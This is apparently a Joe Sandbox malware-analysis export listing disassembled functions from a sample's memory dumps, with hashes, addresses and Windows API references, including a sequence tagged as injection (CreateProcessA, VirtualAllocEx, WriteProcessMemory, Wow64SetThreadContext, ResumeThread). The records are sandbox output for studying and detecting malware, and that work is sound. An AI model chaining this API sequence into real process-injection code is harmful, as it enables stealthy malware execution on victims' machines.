Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroyReadSafe
String ID:
API String ID: 616443815-0
Opcode ID: 3ed2f0e56b0aa3e1f3b611e95e549f1e3948aa57a932af53f9363424e6a6868e
Instruction ID: cc198fb1556a419c9c60d6c88b5b4024496d92aa6c08fe952adca88036682785
Opcode Fuzzy Hash: 3ed2f0e56b0aa3e1f3b611e95e549f1e3948aa57a932af53f9363424e6a6868e
Instruction Fuzzy Hash: 3771E270D046965EDB258F78C840699BBB1AF86224F188BDDE9B59F2D6C331F442CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6F8862C0 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

std::exception::exception.LIBCMT ref: 6F886466

Part of subcall function 6F8D9533: std::exception::_Copy_str.LIBCMT ref: 6F8D954E

__CxxThrowException@8.LIBCMT ref: 6F88647D

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID:
API String ID: 2299493649-0
Opcode ID: a9e106b0e4923dc5fc3c010d52aa697b44227e3efc032b8d9aa253be8dff1a0c
Instruction ID: e07b7cd33b6a44ace58bbdd5e3977197b8a88fb62547f0f2e3403096b42f460a
Opcode Fuzzy Hash: a9e106b0e4923dc5fc3c010d52aa697b44227e3efc032b8d9aa253be8dff1a0c
Instruction Fuzzy Hash: D15169B1918344AFD704CF58C981A4ABBE4BF85750F404DAEF5A98F390D771E944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F89D2E0 Relevance: 3.1, APIs: 2, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

std::exception::exception.LIBCMT ref: 6F89D3E8
__CxxThrowException@8.LIBCMT ref: 6F89D3FF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 4063778783-0
Opcode ID: 5e41d689febe6432ce14e49936a91acadc11979e03984a77d1b1ff76c609a16f
Instruction ID: 10c02d8a7cab8daa54936d8ca3e9bae0c68967e3a0051b15f4a3b0c4b19dd273
Opcode Fuzzy Hash: 5e41d689febe6432ce14e49936a91acadc11979e03984a77d1b1ff76c609a16f
Instruction Fuzzy Hash: E5313C71508705AFC704CF28C88099AB7F5FF89714F508A6EF8958B794E731EA46CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F888400 Relevance: 3.0, APIs: 2, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

std::exception::exception.LIBCMT ref: 6F888449
__CxxThrowException@8.LIBCMT ref: 6F88845E

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 4063778783-0
Opcode ID: 1bebb59f43c1288debdb522e81cc865df20ce14fdb24223082fab90461e1685d
Instruction ID: f44ab6c1905ed41632ecbbbb80e7b069743df61290abd10d39a758fbc37e9f83
Opcode Fuzzy Hash: 1bebb59f43c1288debdb522e81cc865df20ce14fdb24223082fab90461e1685d
Instruction Fuzzy Hash: A0014475904208AFC70CDF54D490C9AB7B5EF94300B51C5EEE92A4F794DB31EA05CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6F888D60 Relevance: 2.6, APIs: 2, Instructions: 78COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,6F888C13,?,6F888CD3,?,6F888C13,00000000,?,?,6F888C13,?,?), ref: 6F888D73
LeaveCriticalSection.KERNEL32(?,?,?,6F888CD3,?,6F888C13,00000000,?,?,6F888C13,?,?), ref: 6F888D8C

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: e68eebd1b5d8dd96ac43c17460d63bab3615d1094ef8246981999494ec99363c
Instruction ID: 8e2106457d265a68c2e480e3f8c88afe51a84ee26dc7449b6a4c9f463bf8053e
Opcode Fuzzy Hash: e68eebd1b5d8dd96ac43c17460d63bab3615d1094ef8246981999494ec99363c
Instruction Fuzzy Hash: 03210975204509EFCB04DF89D990DAAB3BAFFC9310B108599F9168B354D731EE16CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F888BC0 Relevance: 2.6, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,6F886890,?), ref: 6F888BDD
LeaveCriticalSection.KERNEL32(?), ref: 6F888C23

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 3a75e130fb05d52203b01386952e9addef882b80cacaff6dd7ebd26b2095fd70
Instruction ID: 9a5caeefeedf3cea8c8b1b8ece1f3e8546a68c05e692396bef4b1fef2a1b8329
Opcode Fuzzy Hash: 3a75e130fb05d52203b01386952e9addef882b80cacaff6dd7ebd26b2095fd70
Instruction Fuzzy Hash: DF01BC72305104AFCB44DFACD880D9AF7A9FF8821070046AAE905CB300DB32ED60CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 06166D4D Relevance: 1.7, APIs: 1, Instructions: 230processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06166F6C

Memory Dump Source

Source File: 00000006.00000002.1928120539.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6160000_907.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1184a59131740104d85d76dc6a9544006eaebccb7919273b36be52802d8d182e
Instruction ID: b1830cc2022d0088227ad84ef7af1919edf242992458431ef77ad1129541eb65
Opcode Fuzzy Hash: 1184a59131740104d85d76dc6a9544006eaebccb7919273b36be52802d8d182e
Instruction Fuzzy Hash: A4919975D006198FDB50CFAAC8957EEBBF1FF48310F148529E855E7280DB7498A2CB92

Uniqueness

Uniqueness Score: -1.00%

Function 06166D58 Relevance: 1.7, APIs: 1, Instructions: 225processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06166F6C

Memory Dump Source

Source File: 00000006.00000002.1928120539.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6160000_907.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: aeec089081e03e8e4c94b55365750335a91e8b9c65f99a889d3942a583eb3342
Instruction ID: ce9d9bcd62edf1ece2133d994848b2d287dcd23ab1be870956051340b744759b
Opcode Fuzzy Hash: aeec089081e03e8e4c94b55365750335a91e8b9c65f99a889d3942a583eb3342
Instruction Fuzzy Hash: 1891A975D006198FCB50CFAAC8957EEBBF1FF48310F148629E854E7280DB7498A1CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F89E2CE Relevance: 1.7, APIs: 1, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: 46002bee77947703d59a8e2a5ea6c45002aac42c6b0d6a500c6ba149d959d683
Instruction ID: 5be6ace93779c76b7bf44580d70482f5e992f4fd50563d597e7746689fd3a81f
Opcode Fuzzy Hash: 46002bee77947703d59a8e2a5ea6c45002aac42c6b0d6a500c6ba149d959d683
Instruction Fuzzy Hash: 3881ADB0908741AFEB249FAC889174ABBE0BF81308F154DBEE1598F2D0E7759444CB63

Uniqueness

Uniqueness Score: -1.00%

Function 06169000 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1928120539.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6160000_907.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed76f03a7d6086367a1805697dba9c99f978d1faa8596893107900a690272c6
Instruction ID: e1d03010936b7486c255f97e511be54c4ee5a05ecc7a4bab69e8cdde47f88096
Opcode Fuzzy Hash: fed76f03a7d6086367a1805697dba9c99f978d1faa8596893107900a690272c6
Instruction Fuzzy Hash: 9B4129768083848FCB11CF6AC9856DEBFF0EF56210F19849FD494DB262D338954ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 6F887140 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 6F8A2820: _malloc.LIBCMT ref: 6F8A2871

std::tr1::_Xweak.LIBCPMT ref: 6F8871D2

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Xweak_mallocstd::tr1::_
String ID:
API String ID: 4085767713-0
Opcode ID: 69999ea013eb3d09454b831e9c5f9054c46edaecc615bb1de2323fff9d70d0af
Instruction ID: 8ae940a439bc56b808539936d4295da08531da76c5484924b05526665d20db40
Opcode Fuzzy Hash: 69999ea013eb3d09454b831e9c5f9054c46edaecc615bb1de2323fff9d70d0af
Instruction Fuzzy Hash: 3D317275B0474A9FCB14CFA9C880AAEBBB5FF49304B108A9DE8259B745D331F905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0616733A Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 061673CD

Memory Dump Source

Source File: 00000006.00000002.1928120539.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6160000_907.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7dd87c11a5b490ee11229779a13517f2fe4f85a1c3c3374cb61890a8c158d509
Instruction ID: 2e3cc4ac70bcbb50b7ed69f6c3aa7f2809e1828039ac602265860938670693e5
Opcode Fuzzy Hash: 7dd87c11a5b490ee11229779a13517f2fe4f85a1c3c3374cb61890a8c158d509
Instruction Fuzzy Hash: A22122B59002599FCB10CFAAC885BDEBBF5FB48310F10852AE958A7250D378A954CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 06167340 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 061673CD

Memory Dump Source

Source File: 00000006.00000002.1928120539.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6160000_907.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4188d413925bfaf6668bbb46373281d8829b82a868f1648934c4b9141160dc4c
Instruction ID: 3297d1565eb7ca7fba7b572ba83ee9dc62a9b0e54ef982a3df4e3c91e0edcfc1
Opcode Fuzzy Hash: 4188d413925bfaf6668bbb46373281d8829b82a868f1648934c4b9141160dc4c
Instruction Fuzzy Hash: E32103B5900359DFCB10CFAAC885BDEBBF5FB48310F10842AE958A7250D778A950CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 06167128 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32 ref: 06167192

Memory Dump Source

Source File: 00000006.00000002.1928120539.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6160000_907.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8ebaf49e507c3cc1a9a52e104d35d91f810b56d0aae836f3c5714cd97f01e835
Instruction ID: 6b02d4f836a129ced18e0b03614c10abf8bd6740775fd996ca3ff66a6bcc8979
Opcode Fuzzy Hash: 8ebaf49e507c3cc1a9a52e104d35d91f810b56d0aae836f3c5714cd97f01e835
Instruction Fuzzy Hash: AA2137B69002498FCB10CF9AD5457DEBBF4AF88224F24846AD568A3251D338A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0616741A Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0616747F

Memory Dump Source

Source File: 00000006.00000002.1928120539.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6160000_907.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d4c07c61498d559c160f9f00778aed296ac230f4ef763f74ab63985838ae76d7
Instruction ID: b85ca073da79a6a4900293ccfc791f5e46d1349c7f2bd02659d6b9c027a8af5a
Opcode Fuzzy Hash: d4c07c61498d559c160f9f00778aed296ac230f4ef763f74ab63985838ae76d7
Instruction Fuzzy Hash: FE21A9B6D00209CFCB10CF99D9487DEFBF4EB48324F20806AD558A7290C374A445CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 061675CA Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0616762D

Memory Dump Source

Source File: 00000006.00000002.1928120539.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6160000_907.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d1636a982cb198bae638804b98c2982615662e4e2be7d27424f3bc286951d4e1
Instruction ID: c9777de06f2d97ec9c265870e1839edb7d36a30824d640eee9046e67694d36da
Opcode Fuzzy Hash: d1636a982cb198bae638804b98c2982615662e4e2be7d27424f3bc286951d4e1
Instruction Fuzzy Hash: DE1156BA900248DFDB10DF9AD984BEEBBF4EF88324F10845AE558A7210C375A554CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F8E25C3 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6F8DCB3E,6F8D9BD4,?,00000000,00000000,00000000,?,6F8DEA98,00000001,00000214), ref: 6F8E2606

Part of subcall function 6F8DD7D8: __getptd_noexit.LIBCMT ref: 6F8DD7D8

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 529d97d425d4d3f3417bacb227d5f42a98b4728546228a48ad42ac651ef901b5
Instruction ID: 6a98c90d2ad250690f77b6b59a5250335cd0cede4f44a8492fbc0ac4032862ae
Opcode Fuzzy Hash: 529d97d425d4d3f3417bacb227d5f42a98b4728546228a48ad42ac651ef901b5
Instruction Fuzzy Hash: F80171317052169BFB198E25CD24F9A37A4BF83764F104EAAE8658F1E0DB78E410C790

Uniqueness

Uniqueness Score: -1.00%

Function 061671E0 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06167253

Memory Dump Source

Source File: 00000006.00000002.1928120539.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6160000_907.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4f38c2f806d05105bbb0dbfe8332f82e9bee1546cf8fbf31cda0a6523398c86d
Instruction ID: 8e44fee32f18baca008096b4ab9b3b8415ba8ed1a20f9b6eba8635f5c47e9ca6
Opcode Fuzzy Hash: 4f38c2f806d05105bbb0dbfe8332f82e9bee1546cf8fbf31cda0a6523398c86d
Instruction Fuzzy Hash: D51126B6900249CFDB10CFAAC944BDEBBF4EB48324F14841AE558A7260D734A540CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06167130 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32 ref: 06167192

Memory Dump Source

Source File: 00000006.00000002.1928120539.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6160000_907.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 59246ce811fc53b6366c6bc9729d39878f3cbdad56ac7026642f152c8425fc66
Instruction ID: 24cb06fadf97fe0cf985982b3db2f26f7e9d55ff57d0e745d57020f3073752be
Opcode Fuzzy Hash: 59246ce811fc53b6366c6bc9729d39878f3cbdad56ac7026642f152c8425fc66
Instruction Fuzzy Hash: 601155B18003498FCB20DF9AC884BDEBBF4EF88324F208429D458A7250D738A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 061671E8 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06167253

Memory Dump Source

Source File: 00000006.00000002.1928120539.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6160000_907.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0afbd44d22b86b2a6c6c6d255897fb384f477a0ad2a5e3d6ec0f38cc4a334293
Instruction ID: 5cf632c022982bc2f2678bb41492b9ff34b4ba1eaa5e5b0f36a8589519e5ac66
Opcode Fuzzy Hash: 0afbd44d22b86b2a6c6c6d255897fb384f477a0ad2a5e3d6ec0f38cc4a334293
Instruction Fuzzy Hash: 491104B5900259DFCB20DF9AC844BDEBFF4EB48324F208419E559A7250C775A950CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 06167298 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 06167302

Memory Dump Source

Source File: 00000006.00000002.1928120539.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6160000_907.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 67053b28e4f169e83981c0242c0b1bb050eb9886c19597337f37652d56d07227
Instruction ID: c37b1d72281f520fce634701598287244f94e7a92204a26bec43fa0512a71c89
Opcode Fuzzy Hash: 67053b28e4f169e83981c0242c0b1bb050eb9886c19597337f37652d56d07227
Instruction Fuzzy Hash: 521122B48002488FCB20DF9AC588BDEBFF4EB49324F208469D458A7251D774A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 6F89EA40 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

SysAllocString.OLEAUT32 ref: 6F89EA8D

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
